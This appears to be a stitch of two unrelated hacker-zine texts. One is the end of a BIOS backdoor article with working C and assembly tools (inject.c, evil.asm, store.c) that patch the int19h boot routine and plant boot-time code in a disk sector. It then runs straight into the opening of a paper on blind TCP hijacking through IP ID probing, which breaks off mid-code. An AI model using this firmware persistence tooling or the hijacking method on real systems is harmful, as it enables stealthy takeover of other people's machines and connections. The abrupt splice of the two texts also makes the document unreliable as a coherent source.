// $e05b ; POST Entry Point
// $e2c3 ; NMI Handler Entry Point
// $e3fe ; INT 13h Fixed Disk Services Entry Point
// $e401 ; Fixed Disk Parameter Table
// $e6f2 ; INT 19h Boot Load Service Entry Point
// $e6f5 ; Configuration Data Table
// $e729 ; Baud Rate Generator Table
// $e739 ; INT 14h Serial Communications Service Entry Point
// $e82e ; INT 16h Keyboard Service Entry Point
// $e987 ; INT 09h Keyboard Service Entry Point
// $ec59 ; INT 13h Diskette Service Entry Point
// $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
// $efc7 ; Diskette Controller Parameter Table
// $efd2 ; INT 17h Printer Service Entry Point
// $f045 ; INT 10 Functions 0-Fh Entry Point
// $f065 ; INT 10h Video Support Service Entry Point
// $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
// $f841 ; INT 12h Memory Size Service Entry Point
// $f84d ; INT 11h Equipment List Service Entry Point
// $f859 ; INT 15h System Services Entry Point
// $fa6e ; Character Font for 320x200 & 640x200 Graphics \
//         (lower 128 characters)
// $fe6e ; INT 1Ah Time-of-day Service Entry Point
// $fea5 ; INT 08h System Timer ISR Entry Point
// $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
// $ff53 ; IRET Instruction for Dummy Interrupt Handler
// $ff54 ; INT 05h Print Screen Service Entry Point
// $fff0 ; Power-up Entry Point
// $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
// $fffe ; System Model ID


These offsets indicate where to find specific BIOS functionalities in
memory and, as they are standard, you can apply them to your BIOS too. For
example, the BIOS interrupt 19h is located in memory at 0xfe6f2 and its job
is to load the boot loader in RAM and to jump to it. On old systems, a
little trick was to jump to this memory location to reboot the system. But
before considering BIOS code modification, we have one issue to resolve :
BIOS chips have limited space, and while they can provide enough space for
basic backdoors, we’ll quickly end up begging for more room to store code
if we want to do something nice. We have two ways to get more space :


1/ We patch the int19h code so that instead of loading the real
bootloader from the specified device, it loads our code (which will load
the real bootloader once it’s done) from a specific location, like a sector
marked as defective on a specific hard drive. Of course, this operation
implies altering a medium other than the BIOS but, since it provides us
with nearly as much space as we could dream of, this method must be taken
into consideration.


2/ If you absolutely want to stay in BIOS space, you can do a little
trick on some BIOS models. One day, processor manufacturers made a deal
with BIOS manufacturers. Processor manufacturers decided to make it
possible to update the CPU’s microcode in order to fix bugs without
having to recall all the hardware sold (remember the f00f bug ?). The idea
was that the BIOS would store the updated microcode and inject it in the
CPU during each boot process, as modifications to microcode aren’t
permanent. This feature is known as "BIOS update". Of course, this
microcode takes space and we can search for the code injecting it, hook it
so it doesn’t do anything anymore and erase the microcode to store our own
code.


Implementing 2/ is more complex than 1/, so we’ll focus on the
first one to get started. The idea is to make the BIOS load our own code
before the bootloader. This is very easy to do. Again, the Bochs BIOS
sources will come in handy, but if you look at your BIOS dump, you should
see very few differences. The code which interests us is located at 0xfe6f2
and is the 19h BIOS interrupt. This one is very interesting as this is the
one in charge of loading the boot loader. Let’s take a look at the
interesting part of its code :


  // We have to boot from harddisk or floppy
  if (bootcd == 0) {
    bootseg=0x07c0;

ASM_START
    push bp
    mov  bp, sp

    mov  ax, #0x0000
    mov  _int19_function.status + 2[bp], ax
    mov  dl, _int19_function.bootdrv + 2[bp]
    mov  ax, _int19_function.bootseg + 2[bp]
    mov  es, ax         ;; segment
    mov  bx, #0x0000    ;; offset
    mov  ah, #0x02      ;; function 2, read diskette sector
    mov  al, #0x01      ;; read 1 sector
    mov  ch, #0x00      ;; track 0
    mov  cl, #0x01      ;; sector 1
    mov  dh, #0x00      ;; head 0
    int  #0x13          ;; read sector
    jnc  int19_load_done
    mov  ax, #0x0001
    mov  _int19_function.status + 2[bp], ax

int19_load_done:
    pop  bp
ASM_END


int13h is the BIOS interrupt used to access storage devices. In
our case, the BIOS is trying to load the boot loader, which is on the first
sector of the drive. The interesting thing is that by only changing the
value put in one register, we can make the BIOS load our own code. For
instance, if we hide our code in sector number 0xN and patch the
BIOS so that instead of the instruction 'mov cl, #0x01' we have
'mov cl, #0xN', we can have our code loaded at each boot and reboot.
Basically, we can store our code wherever we want to, as we can change the
sector, the track and even the drive to be used. It is up to you to choose
where to store your code but, as I said, a sector marked as defective can
work out as an interesting trick.
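
A side note on the arithmetic involved: int 13h function 02h addresses
sectors by cylinder/head/sector. Sectors are numbered from 1, and only the
low 6 bits of CL hold the sector number (the top two bits carry bits 8-9 of
the cylinder), so a sector number must stay in the range 1..63. The sketch
below is only an illustration under those assumptions; the helper names
chs_pack_cl and track0_offset and the 512-byte sector size are hypothetical
and are not part of the listings that follow.

```c
#include <stdint.h>

#define SECTOR_SIZE 512u  /* assumed sector size */

/* Pack a 1-based sector number (1..63) and a 10-bit cylinder number into
 * the CL layout used by int 13h/AH=02h: bits 0-5 hold the sector, bits
 * 6-7 hold bits 8-9 of the cylinder. Returns -1 if a value does not fit. */
int chs_pack_cl(unsigned cylinder, unsigned sector)
{
    if (sector < 1 || sector > 63 || cylinder > 1023)
        return -1;
    return (int)((((cylinder >> 8) & 0x3u) << 6) | sector);
}

/* Byte offset of a sector located on cylinder 0, head 0.
 * Sector 1 (the boot sector) is at offset 0. */
uint32_t track0_offset(unsigned sector)
{
    return (uint32_t)(sector - 1) * SECTOR_SIZE;
}
```

For instance, chs_pack_cl(0, 1) gives the value 1 that the BIOS code above
loads into CL, and track0_offset(2) gives 512, the byte offset of the sector
right after the boot sector.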


Here are three source files to help you get started faster: the
first one, inject.c, modifies the ROM of the BIOS so that it loads our code
before the boot loader. inject.c needs /dev/bios to run. The second one,
code.asm (listed below as evil.asm), is a skeleton to fill with your own
code and is loaded by the BIOS. The third one, store.c, injects the assembled
code into the target sector of the first track of the hard drive.


--[ inject.c

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define BUFSIZE         512
#define BIOS_DEV        "/dev/bios"
#define CODE            "\xbb\x00\x00"  /* mov bx, 0 */ \
                        "\xb4\x02"      /* mov ah, 2 */ \
                        "\xb0\x01"      /* mov al, 1 */ \
                        "\xb5\x00"      /* mov ch, 0 */ \
                        "\xb6\x00"      /* mov dh, 0 */ \
                        "\xb1\x01"      /* mov cl, 1 */ \
                        "\xcd\x13"      /* int 0x13  */
#define TO_PATCH        "\xb1\x01"      /* mov cl, 1 */
#define SECTOR_OFFSET   1

void usage(char *cmd)
{
    fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);
    exit(1);
}

/*
** This function looks in the BIOS rom and searches for the int19h procedure.
** The algorithm used sucks, as it does only a naive search. Interested
** readers should change it.
*/
char *search(char *buf, size_t size)
{
    /* sizeof - 1 : the trailing NUL of the string is not part of the pattern */
    return memmem(buf, size, CODE, sizeof(CODE) - 1);
}

/*
** Replaces the operand of 'mov cl, 1' inside the matched code.
*/
void patch(char *tgt, size_t size, int sector)
{
    char *tmp;

    tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH) - 1);
    if (tmp != NULL)
        tmp[SECTOR_OFFSET] = (char) sector;
}

int main(int argc, char **argv)
{
    int     sector;
    size_t  i;
    size_t  cnt;
    ssize_t ret;
    int     devfd;
    int     outfd;
    char    *buf;
    char    *tmp;
    char    *dev;
    char    *out;
    char    *tgt;

    if (argc == 3)
    {
        dev = BIOS_DEV;
        out = argv[2];
        sector = atoi(argv[1]);
    }
    else if (argc == 4)
    {
        dev = argv[1];
        out = argv[3];
        sector = atoi(argv[2]);
    }
    else
        usage(argv[0]);
    if ((devfd = open(dev, O_RDONLY)) == -1)
    {
        fprintf(stderr, "could not open BIOS\n");
        exit(1);
    }
    if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT, 0644)) == -1)
    {
        fprintf(stderr, "could not open %s\n", out);
        exit(1);
    }
    /* read the whole ROM, growing the buffer one BUFSIZE at a time */
    if ((buf = malloc(BUFSIZE)) == NULL)
    {
        fprintf(stderr, "out of memory\n");
        exit(1);
    }
    for (cnt = 0; (ret = read(devfd, buf + cnt, BUFSIZE)) > 0; )
    {
        cnt += ret;
        if ((tmp = realloc(buf, cnt + BUFSIZE)) == NULL)
        {
            fprintf(stderr, "out of memory\n");
            exit(1);
        }
        buf = tmp;
    }
    if (ret == -1)
    {
        fprintf(stderr, "error reading BIOS\n");
        exit(1);
    }
    if ((tgt = search(buf, cnt)) == NULL)
    {
        fprintf(stderr, "could not find code to patch\n");
        exit(1);
    }
    /* only look for the instruction inside the matched sequence */
    patch(tgt, sizeof(CODE) - 1, sector);
    for (i = 0; i < cnt; i += ret)
        if ((ret = write(outfd, buf + i, cnt - i)) <= 0)
        {
            fprintf(stderr, "could not write patched ROM to disk\n");
            exit(1);
        }
    close(devfd);
    close(outfd);
    free(buf);
    return 0;
}

--[ evil.asm

;;;
;;; A sample code to be loaded by an infected BIOS instead of
;;; the real bootloader. It basically moves itself so it can
;;; load the real bootloader and jump to it. Replace the nops
;;; if you want it to do something useful.
;;;
;;; usage is :
;;;     no usage, this code must be loaded by store.c
;;;
;;; compile with : nasm -fbin evil.asm -o evil.bin
;;;

BITS 16
ORG 0

;; we need this label so we can check the code size
entry:
        jmp begin               ; jump over data

;; here comes data
drive   db 0                    ; drive we're working on

begin:
        ;; segments init (done first so that [drive] is addressed via ds)
        mov ax, 0x07C0
        mov ds, ax
        mov es, ax

        mov [drive], dl         ; get the drive we're working on

        ;; stack init
        mov ax, 0
        mov ss, ax
        mov ax, 0xffff
        mov sp, ax

        ;; move out of the zone so we can load the TRUE boot loader
        mov ax, 0x7c0
        mov ds, ax
        mov ax, 0x100
        mov es, ax
        mov si, 0
        mov di, 0
        mov cx, 0x200
        cld
        rep movsb

        ;; jump to our new location
        jmp 0x100:next

next:                           ;; to jump to the new location
        ;; load the true boot loader
        mov dl, [drive]
        mov ax, 0x07C0
        mov es, ax
        mov bx, 0
        mov ah, 2
        mov al, 1
        mov ch, 0
        mov cl, 1
        mov dh, 0
        int 0x13

        ;; do your evil stuff there (ie : infect the boot loader)
        nop
        nop
        nop

        ;; execute system
        jmp 07C0h:0

size    equ $ - entry
%if size+2 > 512
  %error "code is too large for boot sector"
%endif
times (512 - size - 2) db 0     ; fill 512 bytes
db 0x55, 0xAA                   ; boot signature

--[ store.c

/*
** code to be used to store a fake bootloader loaded by an infected BIOS
**
** usage is : store <device to store on> <sector number> <file to inject>
**
** compile with : gcc store.c -o store
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>

#define CODE_SIZE       512
#define SECTOR_SIZE     512

void usage(char *cmd)
{
    fprintf(stderr, "usage is : %s <device> <sector> <code>\n", cmd);
    exit(1);
}

int main(int argc, char **argv)
{
    int  off;
    int  i;
    int  devfd;
    int  codefd;
    int  cnt;
    char code[CODE_SIZE];

    if (argc != 4)
        usage(argv[0]);

    /* the device is written to below, so it must be opened for writing */
    if ((devfd = open(argv[1], O_WRONLY)) == -1)
    {
        fprintf(stderr, "error : could not open device\n");
        exit(1);
    }
    off = atoi(argv[2]);
    if ((codefd = open(argv[3], O_RDONLY)) == -1)
    {
        fprintf(stderr, "error : could not open code file\n");
        exit(1);
    }
    for (cnt = 0; cnt != CODE_SIZE; cnt += i)
        if ((i = read(codefd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
        {
            fprintf(stderr, "error reading code\n");
            exit(1);
        }
    /* sectors are numbered from 1 */
    lseek(devfd, (off_t)(off - 1) * SECTOR_SIZE, SEEK_SET);
    for (cnt = 0; cnt != CODE_SIZE; cnt += i)
        if ((i = write(devfd, &(code[cnt]), CODE_SIZE - cnt)) <= 0)
        {
            fprintf(stderr, "error writing code\n");
            exit(1);
        }
    close(devfd);
    close(codefd);
    printf("Device infected\n");
    return 0;
}

Okay, now that we can load our code using the BIOS, time has come 
to consider what we can do in this position. As we are nearly the first one 
to have control over the system, we can do really interesting things. 


First, we can hijack BIOS interrupts and make them jump to
our code. This is interesting because instead of writing all the code in
the BIOS, we can now hijack BIOS routines with as much space as we need
and without having to do a lot of reverse engineering.


Next, we can easily patch the boot loader on the fly, as it is our
own code which loads it. In fact, we don't even have to call the true
boot loader if we don't want to: we can make a fake one that loads a nicely
patched kernel based on the real one. Or you can make a fake boot loader
(or even patch the real one on the fly) that loads the real kernel and
patches it on the fly. The choice is up to you.


Finally, I would like to talk about one last thing that came to my mind.
Combined with IDTR hijacking, patching the BIOS can assure us complete
control of the system. We can patch the BIOS so that it loads our own boot
loader. This boot loader is a special one: it loads a mini-OS of
our own which sets up an IDT. Then, as we hijacked the IDTR register (there
are several ways to do it, the easiest being patching the target OS boot
process in order to prevent it from erasing our IDT), we can load the
true boot loader which will load the true kernel. At this point, our own OS
will hijack the entire system with its own IDT, proxying any interrupt you
want to and hijacking any event on the system. We can even use the system
clock as a scheduler for the two OSes: the tick will be caught by our own
OS and, depending on the configuration (we can say for example 10% of the
time for our OS and 90% for the real OS), we can execute our code or give
control to the real OS by jumping to its IDT.


You can do lots of things simply by patching the BIOS, so I suggest
you implement your own ideas. Remember this is not so difficult:
documentation about this subject already exists and we can really do lots
of things. Just remember to use Bochs for tests before going in the wild;
it certainly isn't fun when smoke comes out of one of the motherboard's
chips...


5. Conclusion 


So that's it, hardware can be backdoored quite easily. Of course,
what I demonstrated here was just a fast overview. We can do LOTS of things
with hardware, things that can assure us total control of the computer
we're on while remaining stealthy. There is a huge amount of work to do in
this area as more and more devices become CPU independent and implement many
features that can be used to do funny things. Imagination (and portability,
sic...) are the only limits.


For people very interested in having fun in the hardware world, I
suggest taking a look at the CPU microcode programming system
(start with the AMD K8 reverse engineering, see [18]), network card
BIOSes and the PXE system.


(And hardware hacking can be a fun start to learn to fuck the TCPA system).


--[ 1 - Introduction


Fun with TCP (blind spoofing/hijacking, etc...) was very popular several
years ago when the initial TCP sequence numbers (ISN) were guessable (64K rule,
etc...). Now that the ISNs are fairly well randomized, this stuff seems to be
impossible.


In this paper we will show that it is still possible to perform blind TCP
hijacking nowadays (without attacking the PRNG responsible for generating
the ISNs, like in [1]). We will present a method which works against a number
of systems (Windows 2K, Windows XP, and FreeBSD 4). This method is not really
straightforward to implement, but is nonetheless entirely feasible, as we've
coded a tool which was successfully used to perform this attack against all
the vulnerable systems.


--[ 2 - Prerequisites


In this section we will give some information that is necessary to
understand this paper.


----[ 2.1 - A brief reminder on TCP 


A TCP connection between two hosts (which will be called respectively
"client" and "server" in the rest of the paper) can be identified by a tuple
[client-IP, server-IP, client-port, server-port]. While the server port is
well known, the client port is usually in the range 1024-5000, and
automatically assigned by the operating system. (Example: the connection
from some guy to freenode may be represented by [ppp289.someISP.com,
irc.freenode.net, 1207, 6667]).


When communication occurs on a TCP connection, the exchanged TCP packet
headers contain this information (actually, the IP header contains
the source/destination IP, and the TCP header contains the
source/destination port). Each TCP packet header also contains fields for a
sequence number (SEQ), and an acknowledgement number (ACK).


Each of the two hosts involved in the connection computes a 32-bit SEQ
number randomly at the establishment of the connection. This initial SEQ
number is called the ISN. Then, each time a host sends some packet with
N bytes of data, it adds N to the SEQ number.

The sender puts its current SEQ in the SEQ field of each outgoing TCP packet.
The ACK field is filled with the next *expected* SEQ number from the other
host. Each host will maintain its own next sequence number (called
SND.NEXT), and the next expected SEQ number from the other host (called
RCV.NEXT).


Let's clarify with an example (for the sake of simplicity, we consider that
the connection is already established, and the ports are not shown.)


    Client                                       Server
[SND.NEXT=1000]                              [SND.NEXT=2000]
         --[SEQ=1000, ACK=2000, size=20]->
[SND.NEXT=1020]                              [SND.NEXT=2000]
         <-[SEQ=2000, ACK=1020, size=50]--
[SND.NEXT=1020]                              [SND.NEXT=2050]
         --[SEQ=1020, ACK=2050, size=0]->


In the above example, first the client sends 20 bytes of data. Then, the
server acknowledges this data (ACK=1020), and sends its own 50 bytes of data
in the same packet. The last packet sent by the client is what we will call
a "simple ACK". It acknowledges the 50 bytes of data sent by the server, but
carries no data payload. The "simple ACK" is used, among other cases, when a
host acknowledges received data, but has no data to transmit yet. Obviously,
any well-formed "simple ACK" packet will not be acknowledged, as this would
lead to an infinite loop. Conceptually, each byte has a sequence number;
it's just that the SEQ contained in the TCP header field represents the
sequence number of the first byte. For example, the 20 bytes of the first
packet have sequence numbers 1000..1019.
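
The bookkeeping of this exchange can be sketched in a few lines of C. This
is only a toy model that touches no network; the struct tcp_host and the
function tcp_send are hypothetical names chosen for the illustration, and
retransmission, windows and flags are ignored.

```c
#include <stdint.h>

/* One host's view of a single TCP connection (names follow the text). */
struct tcp_host {
    uint32_t snd_next;  /* next sequence number this host will send    */
    uint32_t rcv_next;  /* next sequence number expected from the peer */
};

/* Model `from` sending a segment carrying `len` bytes of data to `to`.
 * The segment would carry SEQ = from->snd_next (before the update) and
 * ACK = from->rcv_next. */
void tcp_send(struct tcp_host *from, struct tcp_host *to, uint32_t len)
{
    from->snd_next += len;          /* sender used up len sequence numbers */
    to->rcv_next = from->snd_next;  /* receiver now expects the next byte  */
}
```

Starting from a client at {1000, 2000} and a server at {2000, 1000}, calling
tcp_send() with sizes 20, 50 and 0 in the order of the diagram reproduces the
SND.NEXT values shown there.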


TCP implements a flow control mechanism by defining the concept of "window". 
Each host has a TCP window size (which is dynamic, specific to each TCP 
connection, and announced in TCP packets), that we will call RCV.WND. 


At any given time, a host will accept bytes with sequence numbers
between RCV.NEXT and (RCV.NEXT+RCV.WND-1). This mechanism ensures that at any
time, there can be no more than RCV.WND bytes "in transit" to the host.
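
As an illustration, the window test can be written as a single unsigned
subtraction, which also copes with the sequence space wrapping around at
2^32. The function name seq_in_window is hypothetical; this is a sketch of
the check described above, not code taken from any particular stack.

```c
#include <stdint.h>

/* Returns 1 if seq lies in [rcv_next, rcv_next + rcv_wnd - 1], taking the
 * 32-bit wraparound into account, and 0 otherwise. */
int seq_in_window(uint32_t seq, uint32_t rcv_next, uint32_t rcv_wnd)
{
    /* distance from the left edge of the window, modulo 2^32 */
    return (uint32_t)(seq - rcv_next) < rcv_wnd;
}
```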


The establishment and teardown of the connection is managed by flags in the 
TCP header. The only useful flags in this paper are SYN, ACK, and RST (for 
more information, see RFC793 [2]). The SYN and ACK flags are used in the 
connection establishment, as follows: 


    Client                                       Server

[client picks an ISN]
[SND.NEXT=5000]
         --[flags=SYN, SEQ=5000]-->          [server picks an ISN]
[SND.NEXT=5001]                              [SND.NEXT=9000]
         <-[flags=SYN+ACK, SEQ=9000, ACK=5001]--
[SND.NEXT=5001]                              [SND.NEXT=9001]
         --[flags=ACK, SEQ=5001, ACK=9001]-->

         ...connection established...


You'll remark that during the establishment, the SND.NEXT of each host is
incremented by 1. That's because the SYN flag counts as one (virtual) byte,
as far as the sequence number is concerned. Thus, any packet with the SYN
flag set will increment the SND.NEXT by 1+packet_data_size (here, the data size
is 0). You'll also note that the ACK field is optional. The ACK field is not
to be confused with the ACK flag, even if they are related: the ACK flag is
set if the ACK field exists. The ACK flag is always set on packets belonging
to an established connection.


The RST flag is used to close a connection abnormally (due to an error, for 
example a connection attempt to a closed port). 


----[ 2.2 - The interest of the IP ID


The IP header contains a field named IP_ID, which is a 16-bit integer used by
the IP fragmentation/reassembly mechanism. This number needs to be unique
for each IP packet sent by a host, but will be unchanged by fragmentation
(thus, fragments of the same packet will have the same IP ID).


Now, you must be wondering why the IP_ID is so interesting? Well, there's a
nifty "feature" in some TCP/IP stacks (including Windows 98, 2K, and XP):
these stacks store the IP_ID in a global counter, which is simply incremented
with each IP packet sent. This enables an attacker to probe the IP_ID
counter of a host (with a ping, for example), and so, know when the host is
sending packets.


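Example:

[===========================================================================]
attacker                                       Host
         --[PING]->
         <-[PING REPLY, IP_ID=1000]--

         ... wait a little ...

         --[PING]->
         <-[PING REPLY, IP_ID=1010]--

<attacker> Uh oh, the Host sent 9 IP packets between my pings.
[===========================================================================]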


This technique is well known, and has already been exploited to perform 
really stealth portscans ([3] and [5]). 
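
The arithmetic behind such a probe is just a 16-bit subtraction. Here is a
minimal sketch, assuming a global counter incremented by exactly one per
packet sent; the function name ipid_other_packets is hypothetical, and only
the counting is shown, not the probing itself.

```c
#include <stdint.h>

/* Given the IP IDs seen in two successive replies from the same host,
 * return how many other packets the host sent in between. The second
 * reply itself accounts for one increment, hence the "- 1". The cast to
 * uint16_t handles the counter wrapping around from 65535 to 0. */
unsigned ipid_other_packets(uint16_t first_id, uint16_t second_id)
{
    uint16_t delta = (uint16_t)(second_id - first_id);

    return delta == 0 ? 0u : (unsigned)(delta - 1);
}
```

With the IP IDs 1000 and 1010 of the example, the function returns 9.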


----[ 2.3 - List of information to gather


Well, now, what do we need to hijack an existing TCP connection?


First, we need to know the client IP, server IP, client port, and server
port. In this paper we'll assume that the client IP, server IP, and server
port are known. The difficulty resides in detecting the client port, since
it is randomly assigned by the client's OS. We will see in the following
section how to do that, with the IP_ID.


The next thing we need if we want to be able to hijack both ways (send data
to the client as the server, and send data to the server as the client) is
to know the sequence numbers of both the server and the client.


Obviously, the most interesting is the client sequence number, because it
enables us to send data to the server that appears to have been sent by the
client. But, as the rest of the paper will show, we'll need to detect the
server's sequence number first, because we will need it to detect the
client's sequence number.


--[ 3 - Attack description


In this section, we will show how to determine the client's port, then the
server's sequence number, and finally the client's sequence number. We will
consider that the client's OS is a vulnerable OS. The server can run on any
OS.


----[ 3.1 - Finding the client-port 


Assuming we already know the client/server IP, and the server port, there's
a well known method to test if a given port is the correct client port.
In order to do this, we can send a TCP packet with the SYN flag set to
server-IP:server-port, from client-IP:guessed-client-port (we need to be
able to send spoofed IP packets for this technique to work).


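Here's what will happen when we send our packet if the guessed-client-port
is NOT the correct client port:

[===========================================================================]
Attacker (masquerading as client)                        Server
         --[flags=SYN, SEQ=1000]->

Real client
         <-[flags=SYN+ACK, SEQ=2000, ACK=1001]--
 ... the real client didn't start this connection, so it aborts with RST ...
         --[flags=RST]->
[===========================================================================]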

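Here's what will happen when we send our packet if the guessed-client-port
IS the correct client port:

[===========================================================================]
Attacker (masquerading as client)                        Server
         --[flags=SYN, SEQ=1000]->

Real client
 ... upon reception of our SYN, the server replies by a simple ACK ...
         <-[flags=ACK, SEQ=xxxx, ACK=yyyy]--
 ... the client sends nothing in reply of a simple ACK ...
[===========================================================================]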


Now, what's important in all this is that in the first case the client
sends a packet, and in the second case it doesn't. If you have carefully
read section 2.2, you know this particular thing can be detected by
probing the IP ID counter of the client.


So, all we have to do to test if a guessed client-port is the correct one
is:

- Send a PING to the client, note the IP ID
- Send our spoofed SYN packet
- Resend a PING to the client, note the new IP ID
- Compare the two IP IDs to determine if the guessed port was correct.


Obviously, if one wants to make an efficient scanner, there are many
difficulties, notably the fact that the client may transmit packets on its
own between our two PINGs, and the latency between the client and the server
(which affects the delay after which the client will send its RST packet in
case of an incorrect guess). Coding an efficient client-port scanner is left
as an exercise to the reader :). With our tool - which measures the latency
before the attack and tries to adapt itself to the client's traffic in
real-time - the client-port is usually found in less than 3 minutes.


----[ 3.2 - Finding the server’s SND.NEXT 


Now that we (hopefully :)) have the client port, we need to know the 
server’s SND.NEXT (in other words, his current sequence number). 


Whenever a host receives a TCP packet with the good source/destination ports,
but an incorrect seq and/or ack, it sends back a simple ACK with the correct
SEQ/ACK numbers. Before we investigate this matter, let's define exactly what
a correct seq/ack combination is, as defined by RFC793 [2]:


A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1)
of the host receiving the packet. Typically, the RCV.WND is a fairly large
number (several dozen kilobytes at least).


A correct ACK is an ACK which corresponds to a sequence number of something
the host receiving the ACK has already sent. That is, the ACK field of the
packet received by a host must be lower than or equal to the host's own
current SND.NEXT, otherwise the ACK is invalid (you can't acknowledge data
that was never sent!).


It is important to note that the sequence number space is "circular".
For example, the condition used by the receiving host to check the ACK validity
is not simply the unsigned comparison "ACK <= receiver's SND.NEXT",
but the signed comparison "(ACK - receiver's SND.NEXT) <= 0".
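
In C, this signed comparison is usually written by reinterpreting the 32-bit
difference as a signed integer. A minimal sketch follows; the function name
ack_acceptable is hypothetical, and the cast assumes the usual two's
complement representation.

```c
#include <stdint.h>

/* Wraparound-aware form of "ACK <= SND.NEXT": the unsigned difference is
 * computed modulo 2^32, then read as a signed 32-bit value. */
int ack_acceptable(uint32_t ack, uint32_t snd_next)
{
    return (int32_t)(ack - snd_next) <= 0;
}
```

For instance, with SND.NEXT = 0x10 (just after a wraparound), an ACK of
0xFFFFFFF0 is accepted although it is numerically larger, because it lies 32
bytes "behind" SND.NEXT on the circle.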


Now, let’s return to our original problem: we want to guess server’s 
SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the 
server, the client will send back an ACK, while if we guess right, the 
client will send nothing. As for the client-port detection, this may be 
tested with the IP ID. 


If we look at the ACK checking formula, we note that if we pick
two ACK values, let's call them ack1 and ack2, such that
|ack1-ack2| = 2^31, then at least one of them will be valid (and exactly
one, except at the two boundary values). For example, let ack1=0 and
ack2=2^31. If the receiver's SND.NEXT is between 1 and (2^31 - 1), then ack1
will be an acceptable ack and ack2 will not. If it is between (2^31 + 1) and
(2^32 - 1), then ack2 will be acceptable and ack1 will not. If it is exactly
0 or 2^31, both pass the signed comparison.
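
This property can be checked mechanically against the signed comparison
given earlier. The sketch below is a local check only; ack_acceptable and
pair_accepted are hypothetical names, and the cast assumes two's complement.
It counts how many of the two values ack1 and ack1 + 2^31 pass the test for a
given SND.NEXT.

```c
#include <stdint.h>

/* Signed, wraparound-aware form of "ACK <= SND.NEXT". */
int ack_acceptable(uint32_t ack, uint32_t snd_next)
{
    return (int32_t)(ack - snd_next) <= 0;
}

/* Number of acceptable values (1 or 2) among ack1 and ack1 + 2^31. */
int pair_accepted(uint32_t ack1, uint32_t snd_next)
{
    uint32_t ack2 = ack1 + 0x80000000u;  /* wraps modulo 2^32 */

    return ack_acceptable(ack1, snd_next) + ack_acceptable(ack2, snd_next);
}
```

Whatever SND.NEXT is, pair_accepted() never returns 0, which is what makes
the two-packet trick work: the result is 1 almost everywhere, and 2 only when
SND.NEXT equals one of the two values or sits exactly 2^31 away from them.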


Taking this into consideration, we can more easily scan the sequence number
space to find the server's SND.NEXT. Each guess will involve the sending of
two packets, each with its SEQ field set to the guessed server's SND.NEXT. The
first packet (resp. second packet) will have its ACK field set to ack1
(resp. ack2), so that we are sure that if the guessed SND.NEXT is correct, at
least one of the two packets will be accepted.


The sequence number space is way bigger than the client-port space, but two 
facts make this scan easier: 


First, when the client receives our packet, it replies immediately. There's
no problem with latency between client and server like in the client-port
scan. Thus, the time between the two IP ID probes can be very small,
speeding up our scanning and greatly reducing the odds that the client will
have IP traffic between our probes and mess with our detection.


Secondly, it's not necessary to test all the possible sequence numbers,
because of the receiver's window. In fact, we need only to do approx.
(2^32 / client's RCV.WND) guesses at worst (this fact has already been
mentioned in [6]). Of course, we don't know the client's RCV.WND.
We can take a wild guess of RCV.WND=64K and perform the
scan (trying each SEQ multiple of 64K). Then, if we didn't find anything,
we can try all SEQs such that seq = 32K + i*64K for all i. Then, all SEQs
such that seq = 16K + i*32K, and so on... narrowing the window, while
avoiding re-testing already tried SEQs. On a typical "modern" connection,
this scan usually takes less than 15 minutes with our tool.
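
The coarse-to-fine ordering described here can be sketched as a small
generator. This is only an illustration of the enumeration order, not our
tool: the function name scan_order and its parameters are hypothetical, and
the steps are assumed to be powers of two that divide the size of the space.

```c
#include <stddef.h>
#include <stdint.h>

/* Fill out[] with values in [0, space) in coarse-to-fine order: first every
 * multiple of first_step, then the midpoints between them, and so on until
 * the spacing reaches min_step. No value is produced twice. Returns the
 * number of values written (at most cap). */
size_t scan_order(uint64_t space, uint64_t first_step, uint64_t min_step,
                  uint32_t *out, size_t cap)
{
    size_t n = 0;
    uint64_t v, step;

    /* first pass: 0, first_step, 2*first_step, ... */
    for (v = 0; v < space && n < cap; v += first_step)
        out[n++] = (uint32_t)v;

    /* refinement passes: step/2 + i*step, halving step each time */
    for (step = first_step; step > min_step; step /= 2)
        for (v = step / 2; v < space && n < cap; v += step)
            out[n++] = (uint32_t)v;

    return n;
}
```

On a toy space of 64 values with first_step=16 and min_step=4, the order is
0, 16, 32, 48, then 8, 24, 40, 56, then 4, 12, ..., 60. For the real case the
space would be 2^32 and first_step 64K, so the first pass alone is 65536
guesses.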


With the server’s SND.NEXT known, and a method to work around our ignorance 
of the ACK, we may hijack the connection in the way "server -> client". This 
is not bad, but not terribly useful, we’d prefer to be able to send data 
from the client to the server, to make the client execute a command, etc... 
In order to do this, we need to find the client’s SND.NEXT. 


----[ 3.3 - Finding the client’s SND.NEXT 


What can we do to find the client's SND.NEXT? Obviously we can't use the
same method as for the server's SND.NEXT, because the server's OS is
probably not vulnerable to this attack, and besides, the heavy network
traffic on the server would render the IP ID analysis infeasible.


However, we know the server’s SND.NEXT. We also know that the client’s 
SND.NEXT is used for checking the ACK fields of client’s incoming packets. 
So we can send packets from the server to the client with SEQ field set to 
server’s SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK 
was acceptable. 


If we detect that our ACK was acceptable, that means that
(guessed_ACK - SND.NEXT) <= 0. Otherwise, it means... well, you guessed it,
that (guessed_ACK - SND.NEXT) > 0.


Using this knowledge, we can find the exact SND.NEXT in at most 32 tries
by doing a binary search (a slightly modified one, because the sequence
space is circular).
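
To make the "slightly modified" binary search concrete, here is a sketch
that runs entirely against a simulated oracle. Nothing is sent anywhere: the
variable hidden_snd_next stands in for the unknown value, probe() stands in
for the acceptable/not acceptable answer, and all names are hypothetical.
The idea is to first decide which half of the circle SND.NEXT is in, then
search for the largest accepted value inside that half, where the answers
are monotonic.

```c
#include <stdint.h>

uint32_t hidden_snd_next;  /* simulated unknown value                */
unsigned probes;           /* number of oracle queries made so far   */

/* Simulated oracle: 1 if guess passes "(guess - SND.NEXT) <= 0". */
int probe(uint32_t guess)
{
    probes++;
    return (int32_t)(guess - hidden_snd_next) <= 0;
}

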